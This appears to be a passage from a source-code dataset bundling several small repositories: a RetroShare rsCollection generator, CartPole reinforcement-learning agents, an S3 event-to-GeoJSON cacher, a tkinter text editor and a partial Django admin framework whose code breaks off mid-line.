"text": "rscGenerator-py\n===============\n\nA small rsCollection generator written in Python.\n\nPlease keep the generated rsCollection and the corresponding files in your share.\n\nUsage:\n rscGenerator.py [options] [folder]...\n\nOptions:\n\n -h --help Show this screen\n \n -e --exclude=REGEX Excludes files and folders matching the REGEX\n (By matching the name, not the full path)\n \n -o --output=FILE Write the rsCollection into FILE.\n If not given, it will write into ./generated.rscollection\n \n -s --stdout Print the XML-Tree to stdout. It overrides -o, so no file will be created.\n \n -v --verbose Show what the Script is doing\n\n\nLicense\n=========\n\n```\n DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE\n Version 2, December 2004\n\n Copyright (C) 2013 Richard Schneider\n\n Everyone is permitted to copy and distribute verbatim or modified\n copies of this license document, and changing it is allowed as long\n as the name is changed.\n\n DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE\n TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION\n\n 0. You just DO WHAT THE FUCK YOU WANT TO.\n"
},
{
"alpha_fraction": 0.6064351797103882,
"alphanum_fraction": 0.6106162667274475,
"avg_line_length": 32.138553619384766,
"blob_id": "a75bc2d2d1c4eed1527e28ddfbbef18edffabaf2",
"content_id": "c8f6d077d79e7a009c6b937498ad837e574ab85d",
"detected_licenses": [
"WTFPL"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5501,
"license_type": "permissive",
"max_line_length": 114,
"num_lines": 166,
"path": "/rscGenerator.py",
"repo_name": "MarcusLS/rscGenerator-py",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n# \n# DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE\n# Version 2, December 2004\n#\n# Copyright (C) 2013 Richard Schneider\n#\n# Everyone is permitted to copy and distribute verbatim or modified\n# copies of this license document, and changing it is allowed as long\n# as the name is changed.\n#\n# DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE\n# TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION\n# \n# 0. You just DO WHAT THE FUCK YOU WANT TO.\n#\n\n# imports\nimport sys\nimport os\nimport getopt\nimport hashlib\nimport lxml.etree as xml\nimport re\n\n# function to calculate the sha1 of a file\ndef hashfile(filepath):\n sha1 = hashlib.sha1()\n f = open(filepath, 'r')\n try: \n for chunk in iter(lambda: f.read(160), b''): # Read blockwise to avoid python's MemoryError\n sha1.update(chunk)\n finally:\n f.close()\n return sha1.hexdigest()\n\n# function to check whether the list of expressions creates a match\ndef isMatching(expressions, target):\n for expression in expressions:\n if re.match(expression, target):\n return True\n return False\n\n# recursive function to walk the folder and add the content to the xml-tree\ndef addFolder(parentNode, path, verbose, link, exclude):\n if verbose:\n print '[READ ] Directory\\t' + path\n for entry in os.listdir(path):\n if not isMatching(exclude, entry): # Check for a match with one of the exclude-regEx\n if os.path.isdir(os.path.join(path, entry)):\n child = parentNode\n if not link:\n child = xml.Element('Directory', name=entry)\n parentNode.append(child)\n addFolder(child, os.path.join(path, entry), verbose, link, exclude) # recursive call\n else:\n addFile(parentNode, path, entry, verbose, link) # Add file\n\n# function to add a file to the tree\ndef addFile(parentNode, path, name, verbose, link): \n file = os.path.join(path, name)\n if verbose:\n print '[READ ] File\\t\\t' + file\n if not link:\n child = xml.Element('File')\n child.set('name', name)\n child.set('sha1', hashfile(file))\n child.set('size', str(os.path.getsize(file)))\n parentNode.append(child)\n else:\n print 'retroshare://file?name=' + name + '&size=' + str(os.path.getsize(file)) + '&hash=' + hashfile(file)\n\n# function to print the header with basic informations about this script\ndef printHeader():\n print 'rsCollection generator by Amarandus'\n print ''\n print 'This script is released under the'\n print 'DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE Version 2'\n print '(Check the Code for the full license)'\n print ''\n print 'Please be social and keep the generated rsCollection and the corresponding files in your share.'\n print ''\n\n# function to print the usage and exit\ndef printUsage():\n printHeader()\n print 'Usage:'\n print '\\trscGenerator.py [options] [folder]...'\n print ''\n print 'Options:'\n print ' -e\\t--exclude=REGEX\\tExcludes files and folders matching the REGEX'\n print '\\t\\t\\t(By matching the name, not the full path)'\n print ' -h\\t--help\\t\\tShow this screen'\n print ' -l\\t--link\\t\\tPrints retroshare://-links to copy and paste'\n print ' -o\\t--output=FILE\\tWrite the rsCollection into FILE.'\n print '\\t\\t\\tIf not given, it will write into ./generated.rscollection' \n print ' -s\\t--stdout\\tPrint the XML-Tree to stdout. 
It overrides -o, so no file will be created.'\n print '\\t\\t\\tIt also prevents any output except the XML-Tree.'\n print ' -v\\t--verbose\\tShow what the Script is doing'\n exit()\n\n# main-function\ndef main():\n if len(sys.argv) <= 1: # Not enough arguments\n printUsage()\n \n # Set some defaults:\n verbose = False\n output = 'generated.rsCollection'\n exclude = [] \n stdout = False\n quiet = False\n link = False\n \n # Care for the arguments\n argletters = 'hve:o:sql'\n argwords = ['help', 'exclude=', 'output=', 'verbose', 'stdout', 'quiet', 'link']\n triggers, targets = getopt.getopt(sys.argv[1:], argletters, argwords) \n if len(targets) is 0:\n printUsage()\n \n for trigger, value in triggers:\n if trigger in ['-h', '--help']:\n printUsage()\n elif trigger in ['-e', '--exclude']:\n exclude.append(value)\n elif trigger in ['-o', '--output']:\n output = value\n elif trigger in ['-v', '--verbose']:\n verbose = True\n elif trigger in ['-s', '--stdout']:\n stdout = True\n quiet = True\n elif trigger in ['-l', '--link']:\n quiet = True\n link = True\n \n if quiet:\n verbose = False\n \n if not quiet:\n printHeader()\n \n # Create XML-tree\n root = xml.XML('<!DOCTYPE RsCollection><RsCollection />')\n for target in targets:\n if os.path.isdir(target):\n addFolder(root, target, verbose, link, exclude)\n else:\n path, name = os.path.split(target)\n addFile(root, path, name, verbose, link)\n \n # Make it an ElementTree\n tree = xml.ElementTree(root)\n \n # Print it or write it to a file\n if stdout:\n print ''\n print xml.tostring(tree, pretty_print=True)\n else:\n if verbose:\n print '[WRITE] File\\t\\t' + output\n tree.write(output, pretty_print=True)\n\n#call the main function\nmain()\n"
}
] | 2 |
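The `hashfile()` in rscGenerator.py above reads files in fixed-size chunks to sidestep MemoryError on large inputs, but it opens in text mode `'r'`, which only works on Python 2. A Python 3 sketch of the same chunked SHA-1 pattern (`sha1_of_file` is an illustrative name):

```python
import hashlib

def sha1_of_file(path, chunk_size=160):
    # Chunked read as in rscGenerator.py's hashfile(); note the 'rb' mode:
    # on Python 3 the original's text-mode 'r' would hand str to update().
    sha1 = hashlib.sha1()
    with open(path, 'rb') as f:
        for chunk in iter(lambda: f.read(chunk_size), b''):
            sha1.update(chunk)
    return sha1.hexdigest()
```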
unnat5/RL_notes | https://github.com/unnat5/RL_notes | 30dc5b33c60073711060c659341046b0a5def599 | 61d8eb8a944ea4c5b6cd7ff005533c96d2e98e15 | 5b12cbb7af5332a200f5b6c16b9c04281f0886c9 | refs/heads/master | 2020-03-22T03:16:07.369387 | 2018-11-22T15:30:36 | 2018-11-22T15:30:36 | 139,422,201 | 4 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.8039215803146362,
"alphanum_fraction": 0.8039215803146362,
"avg_line_length": 50,
"blob_id": "efc9d38915fcc9c59cf4f8ae0a269d60a3387e26",
"content_id": "59a14e0670235eeed29add7242772ecfb1a65afd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 102,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 2,
"path": "/README.md",
"repo_name": "unnat5/RL_notes",
"src_encoding": "UTF-8",
"text": "# RL_notes\nThis repository contains notes about Monte Carlo Methods, TD methods, DQN networks and etc\n"
},
{
"alpha_fraction": 0.628811776638031,
"alphanum_fraction": 0.6340693831443787,
"avg_line_length": 33.599998474121094,
"blob_id": "233218729c91ea336aa32c1a8d38809cb8def712",
"content_id": "df7d3232436d7800099846f1437da1e5faf8c70b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1902,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 55,
"path": "/CartPole_smart_agent.py",
"repo_name": "unnat5/RL_notes",
"src_encoding": "UTF-8",
"text": "## This Agent was trained using hill climbing with Adaptive Noise Scaling which comes under POLICY BASED METHODS.\n## And purpose of this script is to show a smart agent!\nimport pickle\nimport gym\nimport numpy as np\n\nwith open('hill_climbing_weight.pickle','rb') as f:\n weight = pickle.load(f)\n\n\nclass Policy():\n def __init__(self, s_size=4, a_size=2):\n \"\"\"\n Here I'm intializing the self.w with trained weights\n The basic purpose of this function is to randomly initalize the weights for the network and then we would\n optimize these weights with noise scaling(adaptive).\n \n Shape: [state_dimension,action_dimension] and softmax activation function at output layer-- when action space is discrete\n [state_dimension, 1 node] and no activation function when action space is not discrete.\n \"\"\"\n #self.w = 1e-4*np.random.rand(s_size, a_size) ##weights for simple linear policy: state_space x action_space\n self.w = weight\n \n def forward(self, state):\n \"\"\"\n Here we multipy(vectorized) our state with weights and get corresponding output \n \"\"\"\n x = np.dot(state,self.w)\n ## below is the implementation of softmax function!!\n return np.exp(x)/sum(np.exp(x))\n \n def act(self,state):\n \"\"\"\n This function decides whether we want our policy to be stochastic or determinstic policy.\n \"\"\"\n probs = self.forward(state)\n #action = np.random.choice(2,p=probs)\n action = np.argmax(probs)\n # option 1: stochastic policy\n # option 2: stochastic policy\n return action\n \n \npolicy = Policy()\n\nenv = gym.make('CartPole-v0')\n\nfor i in range(3):\n state = env.reset()\n while True:\n env.render()\n action = policy.act(state)\n state,reward,done,_=env.step(action)\n if done:\n break"
},
{
"alpha_fraction": 0.5716845989227295,
"alphanum_fraction": 0.5833333134651184,
"avg_line_length": 13.48051929473877,
"blob_id": "9323a557b2d7d069f20db7673ade433b64e60c7d",
"content_id": "4e97e6026d7341a0fcf1a02d637d63f2797e3daa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1116,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 77,
"path": "/policy_g.py",
"repo_name": "unnat5/RL_notes",
"src_encoding": "UTF-8",
"text": "\n\nimport pickle\nimport gym\nimport numpy as np\n\n\nimport torch\ntorch.manual_seed(0)\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.distributions import Categorical\n\nclass Policy(nn.Module):\n def __init__(self, s_size=4, h_size=16, a_size=2):\n super().__init__()\n self.fc1 = nn.Linear(s_size,h_size)\n self.fc2 = nn.Linear(h_size,a_size)\n \n def forward(self,x):\n x = F.relu(self.fc1(x))\n x = self.fc2(x)\n return F.softmax(x,dim=1)\n \n def act(self,state):\n state = torch.from_numpy(state).float().unsqueeze(0)\n probs =self.forward(state).cpu()\n m = Categorical(probs)\n action = m.sample()\n return action.item(),m.log_prob(action)\n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\npolicy = Policy()\npolicy.load_state_dict(torch.load('policy_G_cartpole.pth'))\nenv = gym.make('CartPole-v0')\n\nfor i in range(3):\n state = env.reset()\n while True:\n env.render()\n action,_ = policy.act(state)\n state,reward,done,_=env.step(action)\n if done:\n break"
}
] | 3 |
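CartPole_smart_agent.py above implements a linear softmax policy: multiply the state by a `[state_dim, action_dim]` weight matrix, softmax the result, and take the argmax action. A self-contained numpy sketch of that forward/act step; the weights here are random stand-ins, not the trained pickle:

```python
import numpy as np

# Weight shape from CartPole_smart_agent.py: [state_dim, action_dim].
w = 1e-4 * np.random.rand(4, 2)

def act(state, w):
    x = state @ w
    probs = np.exp(x) / np.sum(np.exp(x))  # softmax over the two actions
    return int(np.argmax(probs))           # deterministic variant of act()

print(act(np.array([0.1, -0.2, 0.05, 0.3]), w))
```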
RagtagOpen/mfol-events-cacher | https://github.com/RagtagOpen/mfol-events-cacher | f25d0faded7b44afbab073cd0ebf766749f81e90 | 2fbc7cb6af717e8a26d92050be654e6b03538224 | 8e979ca137c1e6eb6294fac3d96a76a50134b3e8 | refs/heads/master | 2021-04-03T06:44:42.950957 | 2019-04-22T14:02:49 | 2019-04-22T14:02:49 | 124,775,263 | 0 | 0 | MIT | 2018-03-11T16:20:34 | 2018-10-29T19:35:16 | 2019-04-22T14:02:50 | Python |
[
{
"alpha_fraction": 0.761904776096344,
"alphanum_fraction": 0.773809552192688,
"avg_line_length": 41,
"blob_id": "e40d407a142e8bbbab11459a803900badb1ff587",
"content_id": "6a6b3b514c56137335722ef9c52c3cfceb6e766e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 84,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 2,
"path": "/README.md",
"repo_name": "RagtagOpen/mfol-events-cacher",
"src_encoding": "UTF-8",
"text": "# mfol-events-cacher\nCaches the March For Our Lives events to a GeoJSON file in S3.\n"
},
{
"alpha_fraction": 0.5278904438018799,
"alphanum_fraction": 0.5339756608009338,
"avg_line_length": 24.28205108642578,
"blob_id": "ca6bdf87ceb2a19004a26ad250cd57b30a80a2a0",
"content_id": "cb99bfeccec2f42940d69ddc7148baa742d040a1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1972,
"license_type": "permissive",
"max_line_length": 123,
"num_lines": 78,
"path": "/pull_events.py",
"repo_name": "RagtagOpen/mfol-events-cacher",
"src_encoding": "UTF-8",
"text": "import boto3\nimport json\nimport os\nimport re\nimport requests\nimport sys\n\n\ndef fetch_events_as_geojson():\n resp = requests.get('https://event.marchforourlives.com/cms/event/march-our-lives-events_attend/search_results/?all=1')\n\n features = []\n for detail_text in re.findall(r'var event_details = {(.*?)};', resp.text, re.DOTALL):\n props = {}\n for k, v in re.findall(r\"'(.*?)': '(.*?)',?\", detail_text):\n if v == \"False\":\n v = False\n elif v == \"True\":\n v = True\n elif v == \"None\":\n v = None\n\n props[k] = v\n\n feature = {\n 'type': 'Feature',\n 'properties': None,\n 'geometry': {\n 'type': 'Point',\n 'coordinates': [\n float(props.pop('longitude')),\n float(props.pop('latitude')),\n ]\n }\n }\n feature['properties'] = props\n\n features.append(feature)\n\n # Sort by the ID so the output is deterministic\n features.sort(key=lambda i: i['properties']['id'])\n\n feature_coll = {\n 'type': 'FeatureCollection',\n 'features': features,\n }\n\n print(\"Retrieved %s event features\" % len(features))\n\n return json.dumps(feature_coll, separators=(',',':'))\n\n\ndef push_to_s3(bucket, key, geojson):\n client = boto3.client('s3')\n response = client.put_object(\n Bucket=bucket,\n Key=key,\n Body=geojson.encode('utf8'),\n ACL='public-read',\n ContentType='application/json',\n )\n\n print(\"Saved to S3, etag %s\" % response['ETag'])\n\n\ndef main():\n bucket = os.environ.get('S3_BUCKET')\n key = os.environ.get('S3_KEY')\n\n assert bucket, \"Please set an S3_BUCKET environment variable\"\n assert key, \"Please set an S3_KEY environment variable\"\n\n geojson = fetch_events_as_geojson()\n push_to_s3(bucket, key, geojson)\n\n\nif __name__ == '__main__':\n main()\n"
}
] | 2 |
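`pull_events.py` above packs each scraped event into a GeoJSON Feature (longitude first in `coordinates`, per the GeoJSON spec) and serializes the collection with compact separators. A minimal sketch of that structure; the coordinates and properties below are made-up sample values, not March For Our Lives data:

```python
import json

# Same Feature / FeatureCollection layout that pull_events.py emits.
feature = {
    'type': 'Feature',
    'properties': {'id': '1', 'is_full': False},  # illustrative properties
    'geometry': {'type': 'Point', 'coordinates': [-77.03, 38.90]},  # lon, lat
}
collection = {'type': 'FeatureCollection', 'features': [feature]}
print(json.dumps(collection, separators=(',', ':')))
```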
KhushrajSingh/anytexteditor | https://github.com/KhushrajSingh/anytexteditor | 710c5c33028cceb50f6d2d1ca82ddf02f05c5953 | 7d3b3370b3006ee6916945e3338311cc55b0fcc9 | 451c6decf685be08bc8ab1e5ce016aee872a8c53 | refs/heads/main | 2023-02-24T13:48:23.954696 | 2021-01-24T05:47:15 | 2021-01-24T05:47:15 | 332,376,054 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6281282305717468,
"alphanum_fraction": 0.6707342267036438,
"avg_line_length": 33.29077911376953,
"blob_id": "1b504c57ee39856111bdb757431114fe557e8bfa",
"content_id": "28403acf54ecf97e812502c5294b0efb48f322dd",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4835,
"license_type": "permissive",
"max_line_length": 112,
"num_lines": 141,
"path": "/anytexteditor.py",
"repo_name": "KhushrajSingh/anytexteditor",
"src_encoding": "UTF-8",
"text": "from tkinter import * \nfrom tkinter.filedialog import asksaveasfilename ,askopenfilename \nfrom tkinter.messagebox import showinfo\nr=Tk() \nr.geometry('500x500') \nfile=None\n\nr.title('Untitled-ANY TEXT EDITOR')\n\ndef saveas(): \n global textarea,file\n file=asksaveasfilename(defaultextension='.txt',filetypes=[ ('Text Documents','.txt') ,('All Files','.')]) \n r.title(str(file)+' ANY TEXT EDITOR')\n try: \n f=open(file,mode='w') \n f.write(textarea.get(1.0,END)) \n f.close()\n showinfo('ANY TEXT EDITOR',\"FILE SAVED SUCCESSFULLY\")\n except: \n pass\ndef openit(): \n global textarea ,file,labelf ,r\n try:\n file=askopenfilename(defaultextension='.txt',filetypes=[ ('Text Documents','.txt'), ('All Files','.')]) \n f=open(file,mode='r')\n r.title(str(file))\n textarea.delete(1.0,END) \n cont=f.read() \n textarea.insert(1.0,cont) \n f.close()\n except: \n pass\ndef deletealltext(): \n global textarea,file\n textarea.delete(1.0,END)\n file=None\ndef newfile():\n global file,textarea \n file=None \n textarea.delete(1.0,END) \n r.title('Untitled-ANY TEXT EDITOR')\ntextarea=Text(r,font='arial 21 bold',width=500,height=400,pady=100,bg='yellow') \ntextarea.pack(expand=True,fill=BOTH)\nbutton=Button(r,text='SAVE CURRENT TEXT ',command=saveas,font='arial 13 bold') \nbutton.place(x=140,y=10)\nbutton2=Button(r,text=\"OPEN FILE\",command=openit,font='arial 13 bold') \nbutton2.place(x=20,y=10)\nbutton4=Button(r,text='DELETE ALL TEXT',command=deletealltext,font='arial 13 bold')\nbutton4.place(x=380,y=10)\nbutton5=Button(r,text='NEW FILE',command=newfile,font='arial 13 bold')\nbutton5.place(x=570,y=10)\nScroll = Scrollbar(textarea)\nScroll.pack(side=RIGHT, fill=Y)\nScroll.config(command=textarea.yview)\ntextarea.config(yscrollcommand=Scroll.set)\nlabel2=Label(r,text='ANY TEXT EDITOR',font='arial 20 bold',bg='yellow')\nlabel2.place(x=600,y=40)\ncanas=Canvas(r,width=2000,height=10,bg='black') \ncanas.place(x=0,y=80)\ncanas2=Canvas(r,width=2000,height=10,bg='black') \ncanas2.place(x=0,y=740)\ndef make_menu(w): \n global the_menu\n the_menu = Menu(w, tearoff=0)\n the_menu.add_command(label=\"Cut\")\n the_menu.add_command(label=\"Copy\")\n the_menu.add_command(label=\"Paste\")\ndef show_menu(e):\n w = e.widget\n global the_menu\n the_menu.entryconfigure(\"Cut\",\n command=lambda: w.event_generate(\"<<Cut>>\"))\n the_menu.entryconfigure(\"Copy\",\n command=lambda: w.event_generate(\"<<Copy>>\"))\n the_menu.entryconfigure(\"Paste\",\n command=lambda: w.event_generate(\"<<Paste>>\"))\n the_menu.tk.call(\"tk_popup\", the_menu, e.x_root, e.y_root)\nmake_menu(r)\ntextarea.bind_class(\"Text\", \"<Button-3><ButtonRelease-3>\", show_menu)\nbackgroundcolor=None\nbackgroundcolor=StringVar() \nfontcolor=None \nfontcolor=StringVar() \nfontsize=None \nfontsize=StringVar() \nent1=Entry(r,textvariable=backgroundcolor,font='arial 12 bold',bd=6) \nent1.place(x=100,y=760)\nent1=Entry(r,textvariable=fontcolor,font='arial 12 bold',bd=6) \nent1.place(x=410,y=760)\nent2=Entry(r,textvariable=fontsize,font='arial 12 bold',bd=6) \nent2.place(x=670,y=760)\ndef set_bg_color(): \n try:\n global backgroundcolor ,textarea\n color=backgroundcolor.get() \n textarea['bg']=str(color)\n except: \n pass\ndef set_fg_color(): \n try:\n global fontolor ,textarea\n color=fontcolor.get() \n textarea['fg']=str(color)\n except: \n pass\ndef set_font_sz(): \n try:\n global fontsize ,textarea \n sz=fontsize.get() \n textarea['font']='arial '+str(sz)+' bold'\n except: \n showinfo('ANY TEXT EIDTOR',\"MUST BE INTEGER VALUE\")\ndef set_def():\n 
global textarea\n textarea['font']='arial 21 bold'\ndef set_f():\n global textarea\n textarea['fg']='black'\ndef set_b():\n global textarea\n textarea['bg']='yellow'\ndef set_all():\n global textarea\n textarea['bg']='yellow'\n textarea['fg']='black'\n textarea['font']='arial 21 bold'\nbutton6=Button(r,text='SET BACKGROUND COLOR',font='arial 12 bold',command=set_bg_color) \nbutton6.place(x=100,y=800)\nbutton7=Button(r,text='SET FONT COLOR',font='arial 12 bold',command=set_fg_color) \nbutton7.place(x=410,y=800)\nbutton8=Button(r,text='SET FONT SIZE',font='arial 12 bold',command=set_font_sz)\nbutton8.place(x=670,y=800)\nbutton9=Button(r,text='SET DEFAULT FONT SIZE',font='arial 12 bold',command=set_def)\nbutton9.place(x=910,y=800)\nbutton9=Button(r,text='SET DEFAULT FONT COLOR',font='arial 12 bold',command=set_f)\nbutton9.place(x=910,y=760)\nbutton10=Button(r,text='SET DEFAULT BACKGROUND COLOR',font='arial 12 bold',command=set_b)\nbutton10.place(x=1210,y=760)\nbutton10=Button(r,text='SET ALL DEFAULT',font='arial 12 bold',command=set_all)\nbutton10.place(x=1210,y=800)\nr.mainloop()\n"
}
] | 1 |
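The `saveas()` in anytexteditor.py above pairs `asksaveasfilename` (with `defaultextension` and `filetypes`) with a manual `open`/`write`/`close`. A reduced sketch of that save flow, using a `with` block so the file is always closed and conventional `*` glob patterns in `filetypes`:

```python
import tkinter as tk
from tkinter.filedialog import asksaveasfilename

# Core of anytexteditor.py's saveas(): ask for a path, then write to it.
root = tk.Tk()
root.withdraw()  # dialog only, no editor window
path = asksaveasfilename(defaultextension='.txt',
                         filetypes=[('Text Documents', '*.txt'),
                                    ('All Files', '*')])
if path:                        # empty string when the dialog is cancelled
    with open(path, 'w') as f:  # with-block closes the file automatically
        f.write('sample text')
```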
maxhope8/stark | https://github.com/maxhope8/stark | fe4cf0a99614256a8d50f275ede3de3158779cea | 4670686909b1f0e92b72f1791a0afe056da3d8f9 | 3746667a7b2c6d0c941a22a19929b0ffaf432a33 | refs/heads/master | 2020-11-28T03:31:16.493901 | 2019-12-23T07:01:21 | 2019-12-23T07:01:21 | 229,693,532 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6399999856948853,
"alphanum_fraction": 0.6472727060317993,
"avg_line_length": 21.91666603088379,
"blob_id": "36747d380cab3502eb2cca2f6eec11de01675480",
"content_id": "51ffdc74e7a69cbb98db819ef9a65ee8d309c290",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 301,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 12,
"path": "/starkapp/admin.py",
"repo_name": "maxhope8/stark",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\n\n\nclass UserAdmin(admin.ModelAdmin):\n list_display = [\"pk\", \"name\", \"age\"]\n list_filter = [\"name\", \"age\"]\n\n # 定制action具体方案\n def func(self, request,queryset):\n queryset.update(age=44)\n\n func.short_description = \"批量初始化操作\"\n"
},
{
"alpha_fraction": 0.6220095753669739,
"alphanum_fraction": 0.6244019269943237,
"avg_line_length": 22.885713577270508,
"blob_id": "9949d88376f79ea3ae0fa9791752b13621c1f90f",
"content_id": "0913eec21db3cf415395e77968a68f4fa4a20ab3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 868,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 35,
"path": "/app01/stark1.py",
"repo_name": "maxhope8/stark",
"src_encoding": "UTF-8",
"text": "from django.forms import ModelForm\n\nfrom starkapp.service.stark import site, ModelStark\nfrom app01.models import *\n\n\nclass BookModelForm(ModelForm):\n class Meta:\n model = Book\n fields = \"__all__\"\n error_messages = {\n \"title\": {'required': '不能为空'},\n \"price\": {'required': '不能为空'},\n }\n\n\n# 自定义配置类\nclass BookStark(ModelStark):\n list_display = [\"nid\", \"title\", \"price\", \"publish\", \"authors\"]\n list_display_link = [\"nid\", \"title\"]\n search_fields = [\"title\", \"price\"]\n model_form_class = BookModelForm\n list_filter = [\"authors\", \"publish\", \"title\"]\n\n def patch_list(self, queryset):\n queryset = queryset\n\n patch_list.desc = \"显示\"\n actions = [patch_list]\n\n\nsite.register(Book, BookStark)\nsite.register(Publish)\nsite.register(Author)\nsite.register(AuthorDetail)\n"
},
{
"alpha_fraction": 0.5558133125305176,
"alphanum_fraction": 0.5568923950195312,
"avg_line_length": 37.77614974975586,
"blob_id": "2d0ff33651aeebb2e26c036d2f22258b0a81faad",
"content_id": "76d5eda50a99e76eb181217045d2ba16e88658ae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 19607,
"license_type": "no_license",
"max_line_length": 132,
"num_lines": 478,
"path": "/starkapp/service/stark.py",
"repo_name": "maxhope8/stark",
"src_encoding": "UTF-8",
"text": "import copy\n\nfrom django.conf.urls import url\nfrom django.db.models import ForeignKey, ManyToManyField\nfrom django.forms import ModelForm\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, redirect\nfrom django.urls import reverse\nfrom django.utils.safestring import mark_safe\nfrom django.db.models.fields.related import ManyToManyField\nfrom django.forms.models import ModelChoiceField\n\n\nclass ModelStark(object):\n list_display = [\"__str__\"]\n list_display_link = []\n model_form_class = None\n search_fields = []\n actions = []\n list_filter = []\n\n def __init__(self, model, site):\n self.model = model\n self.site = site\n self.model_name = self.model._meta.model_name\n self.app_label = self.model._meta.app_label\n\n # 使用modelform组件\n def get_modelfrom_class(self):\n # from django.forms import widgets as wid\n class ModelFormClass(ModelForm):\n class Meta:\n model = self.model\n fields = \"__all__\"\n # 这样的字段就限定死了,所以我们这里不能这样使用\n # widgets = {\n # \"title\": wid.TextInput(attrs={\"class\": \"form-control\"})\n # }\n if not self.model_form_class:\n return ModelFormClass\n else:\n return self.model_form_class\n\n # 展示编辑连接\n def edit_link(self, obj=None, is_header=False):\n if is_header:\n return \"操作\"\n name = \"{}_{}_change\".format(self.app_label, self.model_name)\n return mark_safe(\"<a href=%s>编辑</a>\" % reverse(name, args=(obj.pk,)))\n\n # 原本都是在用户自己的配置类中写,但是现在写入modelStark中是因为,是因为每个表可能都能用到,减少代码重复\n def delete_link(self, obj=None, is_header=False):\n if is_header:\n return \"操作\"\n name = \"{}_{}_delete\".format(self.app_label, self.model_name)\n return mark_safe(\"<a href=%s>删除</a>\" % reverse(name, args=(obj.pk,)))\n\n def select_btn(self, obj=None, is_header=None):\n if is_header:\n return mark_safe(\"<input id='mutPut' type='checkbox'>\")\n return mark_safe(\"<input type='checkbox' value=%s name='_selected_action'>\" % obj.pk)\n\n # 获取反向解析的name\n def get_edit_url(self, obj):\n edit_url = \"{}_{}_change\".format(self.app_label, self.model_name)\n return edit_url\n\n def get_delete_url(self, obj):\n delete_url = \"{}_{}_delete\".format(self.app_label, self.model_name)\n return delete_url\n\n def get_add_url(self):\n add_url = \"{}_{}_add\".format(self.app_label, self.model_name)\n return add_url\n\n def get_list_url(self):\n list_url = \"{}_{}_list\".format(self.app_label, self.model_name)\n return list_url\n\n @property\n def get_list_display(self):\n new_list_display = []\n new_list_display.extend(self.list_display)\n # 如果设置了list_display_link就把编辑删除\n if not self.list_display_link:\n new_list_display.append(ModelStark.edit_link)\n new_list_display.append(ModelStark.delete_link)\n new_list_display.insert(0, ModelStark.select_btn)\n\n return new_list_display\n\n # 获取filter的查询条件的Q对象\n @property\n def get_filter_condition(self):\n from django.db.models import Q\n filter_condition = Q()\n for field, val in self.request.GET.items():\n # 过滤非list_filter的值,因为page在里面,加进去之后,查询条件是and,模型中没有报错\n if field in self.list_filter:\n filter_condition.children.append((field, val))\n return filter_condition\n\n @property\n def get_search_condition(self):\n from django.db.models import Q\n search_condition = Q()\n search_condition.connector = \"or\" # 设置关系为或\n if self.search_fields: # [\"title\", \"price\"]\n key_word = self.request.GET.get(\"q\", None)\n # 如果有值才添加,没有纸就直接返回空的Q()\n self.key_word = key_word\n if key_word:\n for search_field in self.search_fields:\n # 因为条件设置得是or所以这里才可以成立,如果是and,全部遍历加进去查询可能会出错\n search_condition.children.append((search_field + 
\"__contains\", key_word))\n return search_condition\n\n # 首页展示页面\n def change_list(self, request):\n if request.method == \"POST\":\n func_name = request.POST.get(\"action\")\n # getlist多个值处理\n pk_list = request.POST.getlist(\"_selected_action\")\n queryset = self.model.objects.filter(pk__in=pk_list)\n func = getattr(self, func_name)\n func(queryset=queryset)\n self.request = request\n add_url = self.get_add_url()\n # search模糊查询\n queryset = self.model.objects.filter(self.get_search_condition)\n # filter模糊查询\n queryset = queryset.filter(self.get_filter_condition)\n cl = ChangeList(self, request, queryset)\n\n return render(request, \"index.html\", locals())\n\n # 批量删除\n def patch_delete(self, queryset):\n queryset.delete()\n return redirect(self.get_list_url())\n patch_delete.desc = \"批量删除\"\n\n def get_actions(self):\n temp = []\n temp.extend(self.actions)\n temp.append(ModelStark.patch_delete)\n return temp\n\n def add(self, request):\n modelform = self.get_modelfrom_class()\n from django.forms.boundfield import BoundField\n form = modelform()\n for field in form:\n print(type(field.field))\n if isinstance(field.field, ModelChoiceField):\n field.is_pop = True\n related_model_name = field.field.queryset.model._meta.model_name\n related_app_name = field.field.queryset.model._meta.app_label\n _url = reverse(\"{}_{}_add\".format(related_app_name, related_model_name)) + \\\n \"?pop_res_id=id_{}\".format(field.name)\n field.url = _url\n if request.method == \"GET\":\n return render(request, \"add_index.html\", locals())\n else:\n data = request.POST\n form = modelform(data=data)\n if 